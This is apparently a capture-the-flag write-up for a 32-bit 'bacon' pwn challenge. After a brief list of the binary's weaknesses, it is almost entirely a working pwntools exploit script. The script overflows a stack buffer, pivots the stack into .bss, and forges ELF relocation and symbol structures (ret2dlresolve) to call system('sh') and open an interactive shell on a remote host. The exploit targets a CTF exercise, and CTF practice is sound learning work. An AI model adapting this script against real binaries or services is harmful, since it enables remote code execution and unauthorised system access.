Tags: pwn 

Rating:

x86 binary - no PIE - simple buffer overflow - NX - no canary - very little useful gadgets

stack pivot and use `ret2dlresolve` and call `system("sh")`

Exploit from https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62

```
from pwn import *
# r = process("./bacon")
r = remote("jh2i.com", 50032)
# gdb.attach(r, "bp 0x08049291")
_elf = ELF("./bacon")
resolver = 0x8049030 #push link_map and call dl_resolve
buf = 0x804cf10 #controllable area (.bss)
leave_ret = 0x08049126 #gadget
'''
0x00000005 (STRTAB) 0x80482ec
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x8048408
'''
SYMTAB = 0x804820c
STRTAB = 0x80482ec
JMPREL = 0x8048408

# Pivoting the stack and calling read(0, buf, 0x80) for the rest of the payload
buffer = ""
buffer += "A"*1032
buffer += p32(buf) #stack pivoting. (esp = buff)
buffer += p32(_elf.plt["read"]) + p32(leave_ret) + p32(0) + p32(buf) + p32(0x80)
buffer += "A"*(0x42c-len(buffer)-1)

# Compute offsets and forged structures
forged_ara = buf + 0x14
rel_offset = forged_ara - JMPREL
elf32_sym = forged_ara + 0x8 #size of elf32_sym

align = 0x10 - ((elf32_sym - SYMTAB) % 0x10) #align to 0x10

elf32_sym = elf32_sym + align
index_sym = (elf32_sym - SYMTAB) / 0x10

r_info = (index_sym << 8) | 0x7

elf32_rel = p32(_elf.got['read']) + p32(r_info)
st_name = (elf32_sym + 0x10) - STRTAB
elf32_sym_struct = p32(st_name) + p32(0) + p32(0) + p32(0x12)

# Rest of the payload: dl-resolve hack :) (the real deal)
buffer2 = 'AAAA' #fake ebp
buffer2 += p32(resolver) # ret-to dl_resolve
buffer2 += p32(rel_offset) #JMPRL + offset = struct
buffer2 += 'AAAA' #fake return
buffer2 += p32(buf+100) # system parameter
buffer2 += elf32_rel # (buf+0x14)
buffer2 += 'A' * align
buffer2 += elf32_sym_struct # (buf+0x20)
buffer2 += "system\x00"
p = (100 - len(buffer2))
buffer2 += 'A' * p #padding
buffer2 += "sh\x00"
p = (0x80 - len(buffer2))
buffer2 += "A" * p #total read size

r.sendline(buffer)
context.log_level = "debug"
r.sendline(buffer2)
r.interactive()
```